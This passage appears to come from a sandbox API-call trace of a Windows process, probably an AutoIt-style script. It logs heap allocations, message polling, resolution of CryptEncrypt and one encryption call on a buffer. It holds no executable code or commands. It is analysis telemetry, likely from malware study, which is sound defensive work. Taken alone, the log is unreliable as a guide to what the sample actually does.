(HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042d8 [0230.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0230.910] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0230.910] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0230.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0230.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0230.910] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0230.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0230.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0230.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0230.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0230.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0230.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e512f8 [0230.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e512f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0230.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0230.911] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0230.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0230.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f378 [0230.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0230.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0230.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0230.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0230.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0230.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0230.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0230.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0230.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0230.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0230.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0230.911] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1bf88*, pdwDataLen=0x8cef60*=0x3baa, dwBufLen=0x3bb0 | out: pbData=0x2f1bf88*, pdwDataLen=0x8cef60*=0x3bb0) returned 1 [0230.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0230.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0230.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0230.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0230.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0230.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0230.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0230.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0230.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0230.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0230.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0230.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0230.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0230.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0230.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0230.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0230.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0230.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0230.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0230.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0230.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55308 [0230.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0230.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0230.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0230.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0230.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0230.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0230.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0230.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0230.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0230.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0230.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0230.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0230.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0230.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0230.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0230.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0230.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0230.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0230.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0230.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0230.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0230.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0230.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0230.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0230.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0230.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0230.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0230.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0230.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0230.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0230.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0230.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55128 [0230.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0230.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0230.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0230.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0230.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0230.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0230.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0230.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0230.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0230.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0230.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0230.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0230.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0230.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0230.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0230.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0230.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0230.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0230.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0230.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0230.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0230.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0230.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0230.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0230.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0230.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0230.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0230.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0230.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0230.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0230.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0230.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0230.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0230.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0230.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0230.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0230.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978518 | out: hHeap=0x970000) returned 1 [0230.916] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0230.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551a8 [0230.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55128 [0230.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0230.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55288 [0230.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0230.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0230.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0230.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0230.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0230.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0230.917] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0230.917] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55128 [0230.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0230.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0230.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0230.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0230.917] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0230.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0230.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0230.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0230.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0230.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0230.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0230.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0230.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0230.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0230.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0230.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0230.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0230.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3bb0) returned 0x2f1fb40 [0230.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0230.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0230.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0230.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0230.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0230.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0230.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0230.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0230.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0230.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0230.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0230.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3bb0) returned 0x2f236f8 [0230.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1fb40 | out: hHeap=0x970000) returned 1 [0230.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0230.918] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0230.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0230.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0230.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0230.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0230.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0230.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0230.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0230.919] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0230.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0230.919] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0230.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0230.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0230.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0230.919] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0230.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0230.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0230.919] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0230.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0230.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0230.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0230.919] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0230.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0230.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0230.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0230.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0230.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0230.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 